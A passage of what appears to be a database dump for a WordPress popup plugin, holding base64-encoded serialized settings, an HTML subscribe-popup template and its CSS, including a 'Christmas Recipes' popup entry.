iO3M6MDoiIjtzOjE2OiJzdWJfZ3JfY3ljbGVfZGF5IjtzOjE6IjAiO3M6MTM6InN1Yl9pY19hcHBfaWQiO3M6MDoiIjtzOjE1OiJzdWJfaWNfYXBwX3VzZXIiO3M6MDoiIjtzOjE1OiJzdWJfaWNfYXBwX3Bhc3MiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTM6InN1Yl9zZl9hcHBfaWQiO3M6MDoiIjtzOjE0OiJzdWJfY2tfYXBpX2tleSI7czowOiIiO3M6MTQ6InN1Yl9tZW1fYWNjX2lkIjtzOjA6IiI7czoxNToic3ViX21lbV9wdWRfa2V5IjtzOjA6IiI7czoxNjoic3ViX21lbV9wcml2X2tleSI7czowOiIiO3M6MTQ6InN1Yl9zYl9hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX3Y2X2FwaV9rZXkiO3M6MDoiIjtzOjEyOiJzdWJfdnRpZ191cmwiO3M6MDoiIjtzOjEzOiJzdWJfdnRpZ19uYW1lIjtzOjA6IiI7czoxMjoic3ViX3Z0aWdfa2V5IjtzOjA6IiI7czoxNjoic3ViX3ltbHBfYXBpX2tleSI7czowOiIiO3M6MTM6InN1Yl95bWxwX25hbWUiO3M6MDoiIjtzOjExOiJzdWJfNGRfbmFtZSI7czowOiIiO3M6MTE6InN1Yl80ZF9wYXNzIjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6MTE6IllvdXIgZS1tYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fXM6NDoibmFtZSI7YTo3OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6OToiWW91ciBuYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fX1zOjIwOiJzdWJfdHh0X2NvbmZpcm1fc2VudCI7czo2NzoiQ29uZmlybWF0aW9uIGxpbmsgd2FzIHNlbnQgdG8geW91ciBlbWFpbCBhZGRyZXNzLiBDaGVjayB5b3VyIGVtYWlsISI7czoxNToic3ViX3R4dF9zdWNjZXNzIjtzOjI0OiJUaGFuayB5b3UgZm9yIHN1YnNjcmliZSEiO3M6MjE6InN1Yl90eHRfaW52YWxpZF9lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoyMDoic3ViX3R4dF9leGlzdHNfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MTY6InN1Yl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHN1YnNjcmlwdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTc6IllvdSBzdWJzY3JpYmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHN1YnNjcmlwdGlvbi4gSWYgeW91IGRpZCBub3Qgc3Vic2NyaWJlIGhlcmUgLSBqdXN0IGlnbm9yZSB0aGlzIG1lc3NhZ2UuIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjM3OiJbc2l0ZW5hbWVdIFlvdXIgdXNlcm5hbWUgYW5kIHBhc3N3b3JkIjtzOjI4OiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo2NToiVXNlcm5hbWU6IFt1c2VyX2xvZ2luXTxiciAvPlBhc3N3b3JkOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MjU6InN1Yl9yZWRpcmVjdF9lbWFpbF9leGlzdHMiO3M6MDoiIjtzOjEzOiJzdWJfYnRuX2xhYmVsIjtzOjE1OiJKb2luIHJpZ2h0IG5vdyEiO3M6MTM6InN1Yl9uZXdfZW1haWwiO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjE1OiJzdWJfbmV3X3N1YmplY3QiO3M6Mjk6Ik5ldyBTdWJzY3JpYmVyIG9uICBbc2l0ZW5hbWVdIjtzOjE1OiJzdWJfbmV3X21lc3NhZ2UiO3M6MTI5OiJZb3UgaGF2ZSBuZXcgc3Vic2NyaWJlciBvbiB5b3VyIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCBoZXJlIHVzIHN1YnNjcmliZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6ODoibG9naW5fYnkiO3M6ODoidXNlcm5hbWUiO3M6MTg6ImxvZ2luX3JlZGlyZWN0X3VybCI7czowOiIiO3M6MTU6ImxvZ2luX2J0bl9sYWJlbCI7czoxMDoi0JvQvtCz0LjQvSI7czoyMzoicmVnX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTM6InJlZ19idG5fbGFiZWwiO3M6ODoiUmVnaXN0ZXIiO3M6MTA6InJlZ19maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiLQmNC80Y8iO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO319czoyMDoicmVnX3R4dF9jb25maXJtX3NlbnQiO3M6MTk1OiLQodGB0YvQu9C60LAg0LTQu9GPINC/0L7QtNGC0LLQtdGA0LbQtNC10L3QuNGPINCx0YvQuyDQvtGC0L/RgNCw0LLQu9C10L3QsCDQvdCwINCy0LDRiCDQsNC00YDQtdGBINGN0LvQtdC60YLRgNC+0L3QvdC+0Lkg0L/QvtGH0YLRiy4g0J/RgNC+0LLQtdGA0YzRgtC1INCy0LDRiNGDINGN0LvQtdC60YLRgNC+0L3QvdGD0Y4g0L/QvtGH0YLRgyEiO3M6MTU6InJlZ190eHRfc3VjY2VzcyI7czo0Mzoi0KHQv9Cw0YHQuNCx0L4g0LfQsCDRgNC10LPQuNGB0YLRgNCw0YbQuNGOISI7czoyMToicmVnX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjU4OiLQn9GD0YHRgtC+0Lkg0LjQu9C4INC90LXQtNC10LnRgdGC0LLQuNGC0LXQu9GM0L3Ri9C5IGVtYWlsIjtzOjE2OiJyZWdfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czo2MToi0J/QvtC00YLQstC10YDQtNC40YLQtSDRgNC10LPQuNGB0YLRgNCw0YbQuNGOINC90LAgW3NpdGVuYW1lXSI7czoyNToicmVnX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InJlZ190eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MzM0OiLQktGLINC30LDRgNC10LPQuNGB0YLRgNC40YDQvtCy0LDQvdGLINC90LAg0YHQsNC50YLQtSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uINCh0LvQtdC00YPQudGC0LUgIDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4g0LTQu9GPINC30LDQstC10YDRiNC10L3QuNGPINGA0LXQs9C40YHRgtGA0LDRhtC40LguINCV0YHQu9C4INCy0Ysg0L3QtSDQt9Cw0YDQtdCz0LjRgdGC0YDQuNGA0L7QstCw0LvQuNGB0Ywg0LfQtNC10YHRjCAtINC/0YDQvtGB0YLQviDQuNCz0L3QvtGA0LjRgNGD0LnRgtC1INGN0YLQviDRgdC+0L7QsdGJ0LXQvdC40LUuIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjQ1OiJbc2l0ZW5hbWVdICDQktCw0Ygg0LvQvtCz0LjQvSDQuCDQv9Cw0YDQvtC70YwiO3M6Mjg6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjcxOiLQm9C+0LPQuNC9OiBbdXNlcl9sb2dpbl08YnIgLz7Qn9Cw0YDQvtC70Yw6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoxMzoicmVnX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InJlZ19uZXdfbWVzc2FnZSI7czoxNzc6ItCjINCy0LDRgSDQvdC+0LLRi9C5INC/0L7Qu9GM0LfQvtCy0LDRgtC10LvRjCDQvdCwINGB0LDQudGC0LUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCDQstC+0YIg0LjQvdGE0L7RgNC80LDRhtC40Y8g0L/QvtC70YzQt9C+0LLQsNGC0LXQu9GPOiA8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czoxMjoiY29udGFjdF9mb3JtIjtzOjI6IjIwIjtzOjEyOiJzdGF0X2dhX2NvZGUiO3M6MDoiIjtzOjU6InR4dF8wIjtzOjA6IiI7fXM6MTA6Im9wdHNfYXR0cnMiO2E6Mjp7czo5OiJiZ19udW1iZXIiO3M6MToiMyI7czoxNjoidHh0X2Jsb2NrX251bWJlciI7czoxOiIxIjt9fQ==','<link href=\"https://fonts.googleapis.com/css?family=Gentium+Basic\" rel=\"stylesheet\">\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			<div class=\"ppsWrapTopImg\">\r\n				[if bg_type_1 == \"img\"]\r\n				<img src=\"[bg_img_1]\" class=\"ppsTopImg\"/>\r\n				[endif]\r\n			</div>\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsBottomCol\">\r\n				[if enb_sm]\r\n					<div style=\"clear: both;\"></div>\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	font-family: \"Gentium Basic\", arial;\r\n	font-size: 13px;\r\n	font-weight: normal;\r\n	color: #000;\r\n  	text-align: center;\r\n}\r\n\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: border-box;\r\n	-moz-box-sizing:    border-box;\r\n	box-sizing:         border-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n  	width: 100%;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  	width: 100%;\r\n  	padding: 40px;\r\n	[if bg_type_0 == \"color\"]\r\n	background-color: [bg_color_0];\r\n  	[elseif bg_type_0 == \"img\"]\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsWrapTopImg {\r\n	display: inline-block;\r\n    text-align: center;\r\n    width: 100%;\r\n	margin-bottom: 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsTopImg {\r\n	display: inline-block;\r\n	max-width: 100%;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell {\r\n	min-height: 200px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	width: 60%;\r\n	display: inline-block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeForm input:first-child {\r\n	margin-top: 0px;\r\n}\r\n/*For all Elements*/\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"email\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"text\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: \"Gentium Basic\", arial;\r\n	font-size: 17px;\r\n	font-weight: normal;\r\n	border: 1px solid transparent;\r\n	width: 100%;\r\n	display: block;\r\n	-webkit-border-radius: 5px;\r\n	-moz-border-radius: 5px;\r\n	border-radius: 5px;\r\n	height: 41px;\r\n	margin: 10px 0 0;\r\n	text-transform: none;\r\n	\r\n	padding-left: 15px;\r\n	background-image: none;\r\n	background-repeat: no-repeat;\r\n  	background-color: #fff;\r\n	color: #13316c;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	margin: 0;\r\n	min-height: 41px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  {\r\n	font-family: \"Gentium Basic\", arial;\r\n	font-size: 17px;\r\n	font-weight: normal;\r\n	display: block;\r\n	margin: 10px 0 0;\r\n	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  span {\r\n	display: inline-block;\r\n	padding-right: 2px;\r\n	vertical-align: middle;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=radio],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=checkbox] {\r\n	vertical-align: middle;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	height: auto;\r\n	padding-top: 9px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password], \r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email] {\r\n	padding-left: 35px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password] {\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/user-black-icon.png\");\r\n	background-position: 12px center;\r\n	\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email] {\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/email-black-icon.png\");\r\n	background-position: 10px center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n  	[if bg_type_2 == \"color\"]\r\n	background: [bg_color_2];\r\n	background: -moz-linear-gradient(top, {{ adjust_brightness(popup.params.tpl.bg_color_2, 75) }} 26%, [bg_color_2] 100%);\r\n	background: -webkit-linear-gradient(top, {{ adjust_brightness(popup.params.tpl.bg_color_2, 75) }} 26%,[bg_color_2] 100%);\r\n	background: linear-gradient(to bottom, {{ adjust_brightness(popup.params.tpl.bg_color_2, 75) }} 26%,[bg_color_2] 100%);\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\"{{ adjust_brightness(popup.params.tpl.bg_color_2, 75) }}\", endColorstr=\"[bg_color_2]\",GradientType=0 );\r\n  	[elseif bg_type_2 == \"img\"]\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n	\r\n	-webkit-border-radius: 5px;\r\n	-moz-border-radius: 5px;\r\n	border-radius: 5px;\r\n	height: 41px;\r\n	text-transform: none;\r\n	margin: 10px 0 0;\r\n	-webkit-box-shadow: 2px 2px 6px 2px rgba(0, 0, 0, 0.75);\r\n	-moz-box-shadow: 2px 2px 6px 2px rgba(0, 0, 0, 0.75);\r\n	box-shadow: 2px 2px 6px 2px rgba(0, 0, 0, 0.75);\r\n	padding: 0;\r\n  	cursor: pointer;\r\n	color: #fff;\r\n	font-size: 20px;\r\n	font-family: \"Gentium Basic\", arial;\r\n	font-weight: normal;\r\n	border: 1px solid transparent;\r\n	width: 100%;\r\n	display: block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	-webkit-box-shadow: 2px 2px  7px 2px rgba(0, 0, 0, 0.75);\r\n	-moz-box-shadow: 2px 2px  7px 2px rgba(0, 0, 0, 0.75);\r\n	box-shadow: 2px 2px  7px 2px rgba(0, 0, 0, 0.75);\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	font-size: 40px;\r\n	line-height: 40px;\r\n	font-weight: bold;\r\n  	margin: 0 30px 30px;\r\n	word-wrap: break-word;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	width: 100%;\r\n	font-size: 14px;\r\n  	margin: 0 30px 20px;\r\n	word-wrap: break-word;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n	top: 15px;\r\n  	right: 10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote {\r\n	color: #585858;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n	word-wrap: break-word;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm {\r\n	margin-top:20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubMsg {\r\n	margin: 0px;\r\n}','merry-christmas.png',1,1,1,11,0,0,0,'2015-01-10 17:59:43',46,0),(47,'Christmas Recipes',1,0,'YTozOntzOjQ6Im1haW4iO2E6MzA6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMzoib3ZlcmxheV9jbGljayI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjtzOjI0OiJoaWRlX2Zvcl91c2VyX3JvbGVzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjExNzp7czo1OiJ3aWR0aCI7czozOiI0MzgiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czozOiIwLjUiO3M6MTU6ImJnX292ZXJsYXlfdHlwZSI7czo1OiJjb2xvciI7czoxNjoiYmdfb3ZlcmxheV9jb2xvciI7czo0OiIjMDAwIjtzOjE0OiJiZ19vdmVybGF5X2ltZyI7czowOiIiO3M6MTg6ImJnX292ZXJsYXlfaW1nX3BvcyI7czo3OiJzdHJldGNoIjtzOjk6ImJnX3R5cGVfMCI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiI2ZmZmZmZiI7czo5OiJiZ190eXBlXzEiO3M6MzoiaW1nIjtzOjg6ImJnX2ltZ18xIjtzOjM5OiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy8zNjUtMS1iZy5wbmciO3M6MTA6ImJnX2NvbG9yXzEiO3M6NzoiI2ZmZmZmZiI7czo5OiJiZ190eXBlXzIiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzIiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8yIjtzOjc6IiMwMjAxMDEiO3M6OToiYmdfdHlwZV8zIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18zIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMyI7czo3OiIjZmZiMmIyIjtzOjEwOiJmb250X2xhYmVsIjtzOjEwOiJBbGV4IEJydXNoIjtzOjE2OiJsYWJlbF9mb250X2NvbG9yIjtzOjc6IiNmZmZmZmYiO3M6MTA6ImZvbnRfdHh0XzAiO3M6NzoiZGVmYXVsdCI7czoxNzoidGV4dF9mb250X2NvbG9yXzAiO3M6NzoiI2ZmZmZmZiI7czoxMDoiZm9udF90eHRfMSI7czo3OiJkZWZhdWx0IjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMSI7czo3OiIjRkZCMkIyIjtzOjEwOiJmb250X3R4dF8yIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8yIjtzOjc6IiMzMzMzMzMiO3M6MTE6ImZvbnRfZm9vdGVyIjtzOjc6ImRlZmF1bHQiO3M6MTc6ImZvb3Rlcl9mb250X2NvbG9yIjtzOjc6IiNiN2I3YjciO3M6MTc6InJlaWRyZWN0X29uX2Nsb3NlIjtzOjA6IiI7czo5OiJjbG9zZV9idG4iO3M6NDoibm9uZSI7czo3OiJidWxsZXRzIjtzOjg6InBvcF9pY29uIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6NToibGFiZWwiO3M6MTU6IkNocmlzdG1hcyBQYXJ0eSI7czo5OiJlbmJfdHh0XzAiO3M6MToiMSI7czo5OiJlbmJfdHh0XzEiO3M6MToiMSI7czo5OiJlbmJfdHh0XzIiO3M6MToiMSI7czoxMzoiZW5iX2Zvb3Rfbm90ZSI7czoxOiIxIjtzOjk6ImZvb3Rfbm90ZSI7czoxMzoiTk8sIFRIQU5LIFlPVSI7czoxNToiZW5iX3NtX2ZhY2Vib29rIjtzOjE6IjEiO3M6MTc6ImVuYl9zbV9nb29nbGVwbHVzIjtzOjE6IjEiO3M6MTQ6ImVuYl9zbV90d2l0dGVyIjtzOjE6IjEiO3M6OToic21fZGVzaWduIjtzOjQ6ImJveHkiO3M6ODoiYW5pbV9rZXkiO3M6NDoibm9uZSI7czoxMzoiYW5pbV9kdXJhdGlvbiI7czowOiIiO3M6MTM6ImVuYl9zdWJzY3JpYmUiO3M6MToiMSI7czo4OiJzdWJfZGVzdCI7czo5OiJ3b3JkcHJlc3MiO3M6MjM6InN1Yl93cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjE5OiJzdWJfYXdlYmVyX2xpc3RuYW1lIjtzOjA6IiI7czoyMToic3ViX2F3ZWJlcl9hZHRyYWNraW5nIjtzOjA6IiI7czoyMToic3ViX21haWxjaGltcF9hcGlfa2V5IjtzOjA6IiI7czoyNToic3ViX21haWxjaGltcF9ncm91cHNfZnVsbCI7czowOiIiO3M6MTQ6InN1Yl9ncl9hcGlfa2V5IjtzOjA6IiI7czoxNjoic3ViX2dyX2N5Y2xlX2RheSI7czoxOiIwIjtzOjEzOiJzdWJfaWNfYXBwX2lkIjtzOjA6IiI7czoxNToic3ViX2ljX2FwcF91c2VyIjtzOjA6IiI7czoxNToic3ViX2ljX2FwcF9wYXNzIjtzOjA6IiI7czoxNDoic3ViX2FjX2FwaV91cmwiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX2tleSI7czowOiIiO3M6MTg6InN1Yl9hcl9mb3JtX2FjdGlvbiI7czowOiIiO3M6MTA6InN1Yl9zZ2FfaWQiO3M6MDoiIjtzOjE1OiJzdWJfc2dhX2xpc3RfaWQiO3M6MDoiIjtzOjIxOiJzdWJfc2dhX2FjdGl2YXRlX2NvZGUiO3M6MDoiIjtzOjEzOiJzdWJfc2ZfYXBwX2lkIjtzOjA6IiI7czoxNDoic3ViX2NrX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfbWVtX2FjY19pZCI7czowOiIiO3M6MTU6InN1Yl9tZW1fcHVkX2tleSI7czowOiIiO3M6MTY6InN1Yl9tZW1fcHJpdl9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfc2JfYXBpX2tleSI7czowOiIiO3M6MTQ6InN1Yl92Nl9hcGlfa2V5IjtzOjA6IiI7czoxMjoic3ViX3Z0aWdfdXJsIjtzOjA6IiI7czoxMzoic3ViX3Z0aWdfbmFtZSI7czowOiIiO3M6MTI6InN1Yl92dGlnX2tleSI7czowOiIiO3M6MTY6InN1Yl95bWxwX2FwaV9rZXkiO3M6MDoiIjtzOjEzOiJzdWJfeW1scF9uYW1lIjtzOjA6IiI7czoxMToic3ViXzRkX25hbWUiO3M6MDoiIjtzOjExOiJzdWJfNGRfcGFzcyI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjY6e3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0